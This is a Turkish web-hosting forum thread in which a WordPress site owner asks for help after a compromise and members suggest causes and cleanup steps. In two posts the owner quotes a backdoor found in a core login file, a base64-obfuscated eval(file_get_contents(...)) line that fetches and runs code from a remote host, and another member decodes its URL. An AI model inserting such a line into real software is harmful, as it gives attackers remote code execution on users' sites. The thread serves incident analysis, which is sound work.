0
Kayıt Ol

Bu Kodlar Ne Anlama Geliyor?

18

1.349

  • 01-10-2017, 19:54:17
    #10
    GoMaster
    GoMaster
    Benimde sitem hacklenmişti bir kaç defa hosting firmasını değiştirdim sorun düzeldi. Veridyen'i öneririm size ilgililer ve herhangi bir hack olayı yaşamadım şuana kadar.
  • 01-10-2017, 19:54:48
    #11
    Moonweb
    Moonweb
    Wtapostar adlı üyeden alıntı: mesajı görüntüle
    Rica ederim.
    Bi zaman yazmıştım okuyabilirsiniz.
    https://programciyiz.biz/wordpress-*...-guvenlimidir/
    Sunucunuzun veya Hostinginizin Log Dosyasına bakın,
    ayrıca sitenizi komple yedekleyip pc nize indirin, tek tek göz atın eklentilere bu dosya varmı diye veya aratın direk dosya adını. temp olarak saklayıp, silinirse tekrar yükletebilirler.
    Çok teşekkürler.
    İçeriği inceleyip, söylediklerinizi uygulayacağım.
    Bir de yine wp-include içerisinde bulunan users dosyasında değişiklik yapmış gibiler. İnceleyebilirseniz çok sevinirim.

    [http://s8.dosya.tc/server5/lpjo16/user.rar.html
  • 01-10-2017, 19:55:00
    #12
    HatayMaster
    HatayMaster
    Üyeliği durduruldu
    Moonweb adlı üyeden alıntı: mesajı görüntüle
    Başka bir tema kullanmış olduğum sitemde de aynı durumla karşılaştım. O nedenle temayı arka plana attım gibi.
    Eklentileri azaltıyorum. Kullandığım eklentiler arasında şüpheli gördükleriniz var mı?
    Şu an için çözüm bulabileceğim bir seçenek var mı?
    Backdoor enfekte edilen kodların açıklamaları Türkçe, bu sebeple aşağıdaki eklentilerden şüphelendim açıkçası. Fakat dediğim gibi herhangi bir tema ve ya eklenti açığından faydalanarak exploit ile de eklenmiş olabilir.
    Sağlık Hesaplama Eklentisi
    Kırık Bağlantı Bildirici
  • 01-10-2017, 19:56:07
    #13
    Wtapostar
    Wtapostar
    Moonweb adlı üyeden alıntı: mesajı görüntüle
    Başka bir tema kullanmış olduğum sitemde de aynı durumla karşılaştım. O nedenle temayı arka plana attım gibi.
    Eklentileri azaltıyorum. Kullandığım eklentiler arasında şüpheli gördükleriniz var mı?
    Şu an için çözüm bulabileceğim bir seçenek var mı?
    Gözüme çarpan pek olmadı ama Eklenti Yapımcısı Türkçe Olan bi Eklenti varsa onu silmenizi veya ismini yazmanızı rica ediyorum. bu kodların açıklamaları türkçe yazılmış çünki.

    Ayrıca Sitenizi sık sık Kontrol Ediin, Böyle Dosyalar barındırıyorsa anında silmenizi tavsiye ediyorum. Daha kapsamlı bir güvenlik için hosting sağlayıcınıza ticket atarak yardım isteyebilirsiniz. Yardımcı olurlar diye düşünüyorum.
  • 01-10-2017, 20:02:20
    #14
    Moonweb
    Moonweb
    GoMaster adlı üyeden alıntı: mesajı görüntüle
    Benimde sitem hacklenmişti bir kaç defa hosting firmasını değiştirdim sorun düzeldi. Veridyen'i öneririm size ilgililer ve herhangi bir hack olayı yaşamadım şuana kadar.
    10+ sitem mevcut ve şu an kullandığım firmada da yaklaşık 1 yıllık hizmetim bulunuyor. Eğer sıkıntı firma ise tabi değiştiririm ama değilse boş yere masraf olmasa iyi olur.
    Rica etsem eski firmanızı mesajla iletir misiniz?

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 19:59:34 -->-> Daha önceki mesaj 19:57:01 --
    Wtapostar adlı üyeden alıntı: mesajı görüntüle
    Gözüme çarpan pek olmadı ama Eklenti Yapımcısı Türkçe Olan bi Eklenti varsa onu silmenizi veya ismini yazmanızı rica ediyorum. bu kodların açıklamaları türkçe yazılmış çünki.

    Ayrıca Sitenizi sık sık Kontrol Ediin, Böyle Dosyalar barındırıyorsa anında silmenizi tavsiye ediyorum. Daha kapsamlı bir güvenlik için hosting sağlayıcınıza ticket atarak yardım isteyebilirsiniz. Yardımcı olurlar diye düşünüyorum.
    Sadece "Sağlık Hesaplama Eklentisi"'nin yapımcısı Türk ama o da diğer sitemde yok.
    Acaba bu eklentilerde bulunan bazı açıkları fark eden birisi girerek bu dosyayı atmış olabilir mi diye düşünüyorum.

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 20:02:20 -->-> Daha önceki mesaj 19:59:34 --
    HatayMaster adlı üyeden alıntı: mesajı görüntüle
    Backdoor enfekte edilen kodların açıklamaları Türkçe, bu sebeple aşağıdaki eklentilerden şüphelendim açıkçası. Fakat dediğim gibi herhangi bir tema ve ya eklenti açığından faydalanarak exploit ile de eklenmiş olabilir.
    Sağlık Hesaplama Eklentisi
    Kırık Bağlantı Bildirici
    Kırık Bağlantı Bildirici, Broken Checker eklentisi.
    Sanırım Türkçe çeviri olduğu için o şekilde görünüyor.
    Çok teşekkürler ilginize.
    Rica etsem büyük olduğu için buraya kodlayamadığım [http://s8.dosya.tc/server5/lpjo16/user.rar.html bu dosyaya da bakabilir misiniz?

    /**
    * Fires after the user has successfully logged in.
    *
    * @since 1.5.0
    *
    * @param string $user_login Username.
    * @param WP_User $user WP_User object of the logged-in user.
    */
    eval(file_get_contents(base64_decode('aHR0cDovL3lh a2FsYWRpbXNpemkuY29tL3dwX2JhY2t1cC93cC50eHQ=')));
    do_action( 'wp_login', $user->user_login, $user );
    return $user;
    }
    /**
    gibi bir kod barındırıyor. Orjinal dosyada göremedim.
  • 01-10-2017, 20:06:45
    #15
    HatayMaster
    HatayMaster
    Üyeliği durduruldu
    Moonweb adlı üyeden alıntı: mesajı görüntüle
    10+ sitem mevcut ve şu an kullandığım firmada da yaklaşık 1 yıllık hizmetim bulunuyor. Eğer sıkıntı firma ise tabi değiştiririm ama değilse boş yere masraf olmasa iyi olur.
    Rica etsem eski firmanızı mesajla iletir misiniz?

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 19:59:34 -->-> Daha önceki mesaj 19:57:01 --



    Sadece "Sağlık Hesaplama Eklentisi"'nin yapımcısı Türk ama o da diğer sitemde yok.
    Acaba bu eklentilerde bulunan bazı açıkları fark eden birisi girerek bu dosyayı atmış olabilir mi diye düşünüyorum.

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 20:02:20 -->-> Daha önceki mesaj 19:59:34 --


    Kırık Bağlantı Bildirici, Broken Checker eklentisi.
    Sanırım Türkçe çeviri olduğu için o şekilde görünüyor.
    Çok teşekkürler ilginize.
    Rica etsem büyük olduğu için buraya kodlayamadığım [http://s8.dosya.tc/server5/lpjo16/user.rar.html bu dosyaya da bakabilir misiniz?

    /**
    * Fires after the user has successfully logged in.
    *
    * @since 1.5.0
    *
    * @param string $user_login Username.
    * @param WP_User $user WP_User object of the logged-in user.
    */
    eval(file_get_contents(base64_decode('aHR0cDovL3lh a2FsYWRpbXNpemkuY29tL3dwX2JhY2t1cC93cC50eHQ=')));
    do_action( 'wp_login', $user->user_login, $user );
    return $user;
    }
    /**
    gibi bir kod barındırıyor. Orjinal dosyada göremedim.
    Verdiğiniz kripto base64 kodunu decode ettiğimde http://yakaladimsizi.com/wp_backup/wp.txt linki çıkıyor..
    Belli ki bu vatandaş sizin gibi bir çok kişiyi yakalamış! Google'de Aratınca Çıkan Sonuç
  • 01-10-2017, 20:12:33
    #16
    Moonweb
    Moonweb
    HatayMaster adlı üyeden alıntı: mesajı görüntüle
    Verdiğiniz kripto base64 kodunu decode ettiğimde http://yakaladimsizi.com/wp_backup/wp.txt linki çıkıyor..
    Belli ki bu vatandaş sizin gibi bir çok kişiyi yakalamış! Google'de Aratınca Çıkan Sonuç
    Aynen öyle olmuş!
    Biz o kadar emek verelim. Milletin yaptığı da..
    Adem Bozkurt diye bir lkişi çıkıyor ortaya da.
    https://www.r10.net/members/76288-adembozkurt.html
    R10'dan banlanmış ama başka ne yapılabilir acaba?
  • 01-10-2017, 20:16:26
    #17
    HatayMaster
    HatayMaster
    Üyeliği durduruldu
    Moonweb adlı üyeden alıntı: mesajı görüntüle
    Aynen öyle olmuş!
    Biz o kadar emek verelim. Milletin yaptığı da..
    Adem Bozkurt diye bir lkişi çıkıyor ortaya da.
    https://www.r10.net/members/76288-adembozkurt.html
    R10'dan banlanmış ama başka ne yapılabilir acaba?
    Bunların biri biter diğeri peydah olur. Bu sebeple kullandığınız tema ve eklentilere dikkat edin, özellikle de açtığım konuda verdiğim önerileri de uygulayın.
  • 01-10-2017, 20:20:57
    #18
    Moonweb
    Moonweb
    HatayMaster adlı üyeden alıntı: mesajı görüntüle
    Bunların biri biter diğeri peydah olur. Bu sebeple kullandığınız tema ve eklentilere dikkat edin, özellikle de açtığım konuda verdiğim önerileri de uygulayın.
    Konunuzu da okudum.
    Teşekkür ederim tüm cevaplarınız için.
    Gerekli önlemleri alıp, kontrolde kalacağım.